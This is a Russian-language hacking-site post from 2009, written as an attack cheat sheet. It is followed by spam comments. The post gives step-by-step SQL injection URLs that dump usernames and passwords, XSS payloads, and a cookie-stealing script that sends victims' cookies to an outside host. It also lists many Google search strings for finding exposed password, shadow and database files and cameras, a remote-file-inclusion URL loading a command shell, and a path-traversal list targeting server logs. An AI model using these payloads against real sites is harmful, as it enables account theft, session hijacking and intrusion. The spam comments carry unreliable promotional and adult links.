..:: Help source by Ms-hack :: For Help scan Sites Bugz ::.. - 2 Ноября 2009 - PROxy TeaM - САЙТ ПО БЕЗОПАСНОСТИ В СЕТИ

Среда, 16.05.2012, 16:37
Приветствую Вас Гость | RSS
PROxy Security TeaM
Главная
Регистрация
Вход
Меню сайта

СРОЧНО
Открыть наш IRC канал ?
Всего ответов: 242

Уязвимости

Главная » 2009 » Ноябрь » 2 » ..:: Help source by Ms-hack :: For Help scan Sites Bugz ::..
22:10
..:: Help source by Ms-hack :: For Help scan Sites Bugz ::..
Aвтор не несет некакиx ответственности
                            
                            ..::SQL-Injection::..
                            
1.www.site.am/gui.php?k=34
2.www.site.am/gui.php?k=34'
3.www.site.am/gui.php?k=34'+order+by+columnweight/*
    For example: www.site.am/gui.php?k=34'+order+by+49/*
4.www.site.am/gui.php?k=34'+union+select+1,2,Version(),4,5,6, & column weight/*
5.www.site.am/gui.php?k=34'+union+select+1,2,3,4,5,6, & column weight + from + users/*
6.www.site.am/gui.php?k=34'+union+select+1,2,userid,4,5,6, & column weight + from + users/*
7.www.site.am/gui.php?k=34'+union+select+1,2,username,4,5,6, & column weight + from + users/*    
8.www.site.am/gui.php?k=34'+union+select+1,2,password,4,5,6, & column weight + from + users/*    
9.www.site.am/gui.php?k=34'+union+select+1,2,concat_ws(0x3a3a,userid,username,password),4,5,6, & column weight + from + users/*
10.www.site.am/gui.php?k=34'+union+select+1,2,concat_ws(0x3a3a,userid,username,password),4,5,6, & column weight + from + users + limit + "anyuserid",1/*
                                                                                                                                               |
                                                                                                                                               integer
                                                                                                
                                        or
                                        
11.www.site.am/gui.php?k=34'+union+select+1,2,pass,4,5,6, & column weight + from + users/*
12.www.site.am/gui.php?k=34'+union+select+1,2,pass,4,5,login, & column weight + from + users/*
13.www.site.am/index.php?page=-1'+union+select+1,concat(user_name,0x3a,h_password),3,4,5,6,7,8,9,10,11+from+users+limit+0,1/*
14.www.site.am/[script]/yorum.asp?mesajid=11+union+select+0+from+msysobjects
15.md5.rednoize.com

                                ..::XSS::..

1.www.site.am/details.php?s=65&id=12
2.www.site.am/details.php?s=65&id=<script>alert('XSS')</script>
3.www.site.am/details.php?s=65&id=<script>alert(document.cookie)</script>
4.Create "Index.html" & "cookie.js" in our site =)
            |
            V--> Index.html -->  <script> document.location.href="http://www.site.am/details.php?s=65&id=
                                 <script>document.location.href="http://our site/cookie.js"</script>";</script>
                                                                                    |
                                                                                    |
                                                                                    V--> Cookie.js -->  img=new image();
                                                                                                        img.src="http://www.utech.in.ua/whs/s.gif?"+document.cookie;

Examples:

www.site.com/?>'"><script>alert("XSS Vuln")</script>
www.site.com/index.php/>"><script>alert("XSS Vuln")</script>
www.site.com/index.php?option=>"><script>alert("XSS Vuln")</script>
www.site.com/index.php?option=com_poll&Itemid=>"><script>alert("XSS Vuln")</script>
www.site.com/index.php?option=com_poll&task=view&id=>"><script>alert("XSS Vuln")</script>
www.site.com/index.php?option=com_poll&Itemid=1&task=>"><script>alert("XSS Vuln")</script>
www.site.com/index.php?option=com_poll&task=view&bid=>"><script>alert("XSS Vuln")</script>
www.site.com/index.php?option=com_poll&Itemid=1&task=view&contact_id=>"><script>alert("XSS Vuln")</script>

                               ..::Google::..
                
1.filetype:dat passwd
2.inurl:MultiCameraFrame?Mode=
3.http://ru.lmgtfy.com/?q=Roberto
4.intitle:"--- VIDEO WEB SERVER ---" intext:"Video Web Server" "Any time & Any where" username password

Examples:

"access denied for user" "using password"
"Chatologica MetaSearch" "stack tracking:"
"Index of /backup"
"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
?intitle:index.of? mp3 name
allintitle:"Network Camera NetworkCamera"
allinurl: admin mdb
allinurl:auth_user_file.txt
intitle:"live view" intitle:axis
intitle:axis intitle:"video server"
intitle:liveapplet
inurl:"ViewerFrame?Mode="
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:passlist.txt
!Host=*.* intext:enc_UserPassword=* ext:pcf
" -FrontPage-" ext:pwd inurl:(service | authors | administrators | users)
"A syntax error has occurred" filetype:ihtml
"About Mac OS Personal Web Sharing"
"access denied for user" "using password"
"allow_call_time_pass_reference" "PATH_INFO"
"An illegal character has been found in the statement" -"previous message"
"ASP.NET_SessionId" "data source="
"AutoCreate=TRUE password=*"
"Can't connect to local" intitle:warning
"Certificate Practice Statement" inurl:(PDF | DOC)
"Chatologica MetaSearch" "stack tracking"
"Copyright © Tektronix, Inc." "printer status"
"detected an internal error [IBM][CLI Driver][DB2/6000]"
"Dumping data for table"
"IMail Server Web Messaging" intitle:login
"Incorrect syntax near"
"Index of /" +.htaccess
"Index of /" +passwd
"Index of /" +password.txt
"Index of /admin"
"Index of /mail"
"Index Of /network" "last modified"
"Index of /password"
"index of /private" site:mil
"index of /private" -site:net -site:com -site:org
"Index of" / "chat/logs"
"index of/" "ws_ftp.ini" "parent directory"
"Installed Objects Scanner" inurl:default.asp
"Internal Server Error" "server at"
"liveice configuration file" ext:cfg
"Login - Sun Cobalt RaQ"
"Mecury Version" "Infastructure Group"
"Microsoft ® Windows * ™ Version * DrWtsn32 Copyright ©" ext:log
"More Info about MetaCart Free"
"Most Submitted Forms and Scripts" "this section"
"mysql dump" filetype:sql
"mySQL error with query"
"Network Vulnerability Assessment Report" ???? pc007.com
"not for distribution" confidential
"ORA-00921: unexpected end of SQL command"
"ORA-00933: SQL command not properly ended"
"ORA-00936: missing expression"
"pcANYWHERE EXPRESS Java Client"
"phone * * *" "address *" "e-mail" intitle:"curriculum vitae"
"phpMyAdmin MySQL-Dump" "INSERT INTO" -"the"
"phpMyAdmin MySQL-Dump" filetype:txt
"phpMyAdmin" "running on" inurl:"main.php"
"PostgreSQL query failed: ERROR: parser: parse error"
"Powered by mnoGoSearch - free web search engine software"
"powered by openbsd" +"powered by apache"
"Powered by UebiMiau" -site:sourceforge.net
"produced by getstats"
"Request Details" "Control Tree" "Server Variables"
"robots.txt" "Disallow:" filetype:txt
"This summary was generated by wwwstat"
"VNC Desktop" inurl:5800
"Warning: Cannot modify header information - headers already sent"
"Web File Browser" "Use regular expression"
"xampp/phpinfo
"You have an error in your SQL syntax near"
"Your password is * Remember this for later use"
aboutprinter.shtml
allintitle:admin.php
allinurl:"/*/_vti_pvt/" | allinurl:"/*/_vti_cnf/"
allinurl:admin mdb
allinurl:auth_user_file.txt
allinurl:servlet/SnoopServlet
An unexpected token "END-OF-STATEMENT" was found
camera linksys inurl:main.cgi
Canon Webview netcams
Comersus.mdb database
confidential site:mil
ConnectionTest.java filetype:html
data filetype:mdb -site:gov -site:mil
eggdrop filetype:user user
ext:conf NoCatAuth -cvs
ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-"
ext:txt inurl:unattend.txt
filetype:ASP ASP
filetype:ASPX ASPX
filetype:BML BML
filetype:cfg ks intext:rootpw -sample -test -howto
filetype:cfm "cfapplication name" password
filetype:CFM CFM
filetype:CGI CGI
filetype:conf inurl:psybnc.conf "USER.PASS="
filetype:dat "password.dat
filetype:DIFF DIFF
filetype:DLL DLL
filetype:DOC DOC
filetype:FCGI FCGI
filetype:HTM HTM
filetype:HTML HTML
filetype:inf sysprep
filetype:JHTML JHTML
filetype:JSP JSP
filetype:log inurl:password.log
filetype:MV MV
filetype:pdf "Assessment Report" nessus
filetype:PDF PDF
filetype:PHP PHP
filetype:PHP3 PHP3
filetype:PHP4 PHP4
filetype:PHTML PHTML
filetype:PL PL
filetype:PPT PPT
filetype:PS PS
filetype:SHTML SHTML
filetype:STM STM
filetype:SWF SWF
filetype:TXT TXT
filetype:XLS XLS
htpasswd / htpasswd.bak
Index of phpMyAdmin
index of: intext:Gallery in Configuration mode
index.of passlist
intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"
intext:"d.aspx?id" || inurl:"d.aspx?id"
intext:"enable secret 5 $"
intext:"powered by Web Wiz Journal"
intext:"SteamUserPassphrase=" intext:"SteamAppUser=" -"username" -"user"
intitle:"--- VIDEO WEB SERVER ---" intext:"Video Web Server" "Any time & Any where" username password
intitle:"500 Internal Server Error" "server at"
intitle:"actiontec" main setup status "Copyright 2001 Actiontec Electronics Inc"
intitle:"Browser Launch Page"
intitle:"DocuShare" inurl:"docushare/dsweb/" -faq -gov -edu
intitle:"EverFocus.EDSR.app<-b>let"
intitle:"Index of" ".htpasswd" "htgroup" -intitle:"dist" -apache -htpasswd.c
intitle:"Index of" .bash_history
intitle:"Index of" .mysql_history
intitle:"Index of" .mysql_history
intitle:"Index of" .sh_history
intitle:"Index of" cfide
intitle:"index of" etc/shadow
intitle:"index of" htpasswd
intitle:"index of" intext:globals.inc
intitle:"index of" master.passwd 007????
intitle:"index of" members OR accounts
intitle:"index of" passwd
intitle:"Index of" passwords modified
intitle:"TUTOS Login"
intitle:"VMware Management Interface:" inurl:"vmware/en/"
intitle:"Welcome to the Advanced Extranet Server, ADVX!"
intitle:"Welcome to Windows 2000 Internet Services"
intitle:"Connection Status" intext:"Current login"
intitle:"inc. vpn 3000 concentrator" intitle:asterisk.management.portal web-access
intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com
intitle:index.of administrators.pwd
intitle:index.of cgiirc.config
intitle:Index.of etc shadow site:passwd
intitle:index.of intext:"secring.skr"|"secring.pgp"|"secring.bak"
intitle:index.of master.passwd
intitle:index.of passwd passwd.bak
intitle:index.of people.lst
intitle:index.of trillian.ini
intitle:Novell intitle:WebAccess "Copyright &# Novell, Inc"
intitle:opengroupware.org "resistance is obsolete" "Report Bugs" "Username" "password"
intitle:open-xchange inurl:login.pl
inurl:":10000" intext:webmin
inurl:"8003/Display?what="
inurl:"auth_user_file.txt"
inurl:"GRC.DAT" intext:"password"
inurl:"printer/main.html" intext:"settings"
inurl:"slapd.conf" intext:"credentials" -manpage -"Manual Page" -man: -sample
inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual Page" -man: -sample
inurl:"ViewerFrame?Mode="
inurl:"wvdial.conf" intext:"password" ????007????
inurl:"wwwroot/
inurl:/Citrix/Nfuse17/
inurl:/db/main.mdb
inurl:/wwwboard
inurl:access
inurl:admin filetype:db
inurl:asp
inurl:buy
inurl:ccbill filetype:log
inurl:cgi
inurl:cgiirc.config
inurl:chap-secrets -cvs
inurl:config.php dbuname dbpass
inurl:data

                                ..::Include::..
                                
1. www.site.am/toplist.php?f=toplist_top10&phpbb_root_path=http://yourhost/cmd.gif?cmd=ls
 ../../../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../../../var/log/httpd/error_log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../apache/logs/error.log
../../../../apache/logs/access.log
../../../../../apache/logs/error.log
../../../../../apache/logs/access.log
../../../../../../apache/logs/error.log
../../../../../../apache/logs/access.log
../../../../../../../apache/logs/error.log
../../../../../../../apache/logs/access.log
../../../../../../../../apache/logs/error.log
../../../../../../../../apache/logs/access.log
../../../logs/error.log
../../../logs/access.log
../../../../logs/error.log
../../../../logs/access.log
../../../../../logs/error.log
../../../../../logs/access.log
../../../../../../logs/error.log
../../../../../../logs/access.log
../../../../../../../logs/error.log
../../../../../../../logs/access.log
../../../../../../../../logs/error.log
../../../../../../../../logs/access.log
../../../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../../../var/log/access_log
../../../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../../../var/log/access_log
../../../../../../../../../../../../var/log/error_log  

Просмотров: 7350 | Добавил: Ms-hack | Рейтинг: 2.3/3
Всего комментариев: 221 2 3 »
0  
22 Fleeniarade   (03.05.2012 04:48)
Планшетный персональный компьютер (<a href="http://planshetnik.com/">планшет windows</a>, tablet PC) — полноразмерный ноутбук, относящийся к классу ПК, оборудованный сенсорным экраном и позволяющий работать при помощи стилуса или пальцев, как с использованием, так и без использования клавиатуры и мыши.Данная разновидность персональных компьютеров — <a href="http://planshetnik.com/">планшетный компьютер wifi</a> (или tablet PC) появилась в широкой продаже после презентации аппаратно-программной платформы Microsoft Tablet PC, разработанной компанией Microsoft и представленной 7 ноября 2002 года. До этого времени устройства такого типа использовались на более узких рынках — на производстве, в медицине и госучреждениях. <a href="http://planshetnik.com/">планшетный компьютер отзывы</a> и сегодня широко используются в госучреждениях и корпоративной среде.

0  
21 ObsessIndunnYf   (01.05.2012 22:41)
<a href="http://vivozmusoravmoskve.ru/">вывоз мусора в Москве</a>

0  
20 Apponeeffesse   (02.04.2012 11:21)
htttp://google.com

0  
19 aozokwoy   (31.03.2012 11:52)
Взрослый блоге:
http://aed280e5.allanalpass.com
http://xaijo.com/land?new-yj.html
http://blog.erolove.in/land?new-qf.html
http://amateur.erolove.in/pagexh.html
http://shop.xaijo.com/?new-ko.html

0  
18 Apponeeffesse   (30.03.2012 13:03)
Hello. And Bye.
variant2

0  
17 aokokooy   (16.03.2012 16:27)
Блог :
http://aed280e5.allanalpass.com
http://xaijo.com/land?new-qx.html
http://blog.erolove.in/land?new-zv.html
http://amateur.erolove.in/pagezg.html

0  
16 annavladidi   (29.01.2012 16:13)
Анализ воспитательной работы за полугодие
Книги по вдеомонтажу в

електронному вигляд безкоштовн
Полный справочник по содержанию драгметаллов в радиодеталях

0  
15 mnzcikd   (24.01.2012 20:52)
Блог:
http://blog.erolove.in/land?ph.html

0  
14 noksdiekVoina   (21.01.2012 23:59)
http://ylxzmgv.hostingsociety.com/nastrojki-jimm-j600e.html настройки jimm j600e

мир кожи и меха сайт

майл ру сайт

http://kmxvkwa.hostingsociety.com/jimm-dlja-fly-e310.html jimm для fly e310

кубок мира 2012

builder fake агент вконтакте by sin3v v1.0

http://kmxvkwa.hostingsociety.com/konsruktor-jimm.html консруктор jimm

майл ру хочу

тулбар вконтакте скачать

http://oucjfqn.hostingsociety.com/opera-mini-veb-brauzer.html opera mini веб браузер

http vkontakte 1 1 ru

мой мир mail.ru

http://hdvvnjx.hostingsociety.com/mini-opera-dlja-nokia-6300.html мини опера для нокиа 6300

скачать программу для голосов вконтакте

сайт похож на вконтакте

http://iubdyen.hostingsociety.com/skachatj-opera-mini-nokia-n73.html скачать opera mini nokia n73


http www odnoklassniki rui флеш плеер для вконтакте знакомства love mamba vk com chtozagroup vkontakte ru видео http odnoklassniki ru sputnik start животный мир онлайн майл ру погода в эссене www mamba ru мир предметов

0  
13 noksdiekVoina   (21.01.2012 19:17)
http://mzgbeke.hostingsociety.com/mini-opera-biz.html mini opera biz

doguran vkontakte

пакет программ для вконтакте

http://duwjfht.hostingsociety.com/jimm-love-na-kompjjuter.html jimm love на компьютер

mail знакомства mamba

mail. ru мой мир

http://jzvfqvg.hostingsociety.com/jimm-best-v.html jimm best v

api vk com oauth authorize

посмотреть скрытый профиль вконтакте

http://wscunxx.hostingsociety.com/skachatj-jimm-feniks.html скачать jimm feniks

взлом mail ru бесплатно

музыка скачать вконтакте

http://iubdyen.hostingsociety.com/dzhim.html джим

vkontakte vxod

qip.online вконтакте

http://lghezql.hostingsociety.com/skachatj-jimm-jar-besplatno.html скачать jimm jar бесплатно


война и мир образы майл ру дикий ангел проблемы мира список анонимайзеров вконтакте мира 26 kazan mail ru официальный мир танков проспект мира д mail tour ru звездные блоги на mail ru

1-10 11-20 21-22
Имя *:
Email:
Код *:
Мой Профиль
Гость

Сообщения:

Группа:
Гости
Время:16:37

Добро пожаловать на Proxy Team. Пожалуйста Зарегистрируйтесь
E-mail:
Пароль:

Рекомендуем
  • http://Cracklab.ru
  • http://Securitylab.ru
  • http://delfcode.ru/

  • Новости

    О Сайте
    ------------------------------ Форум: 22/204
    Новости: 6
    Файлы: 173
    Статей: 21

    Сейчас на Сайте: 2
    Гостей: 2
    Пользователей: 0


    PROxy TeaM © 2012
    Сделать бесплатный сайт с uCoz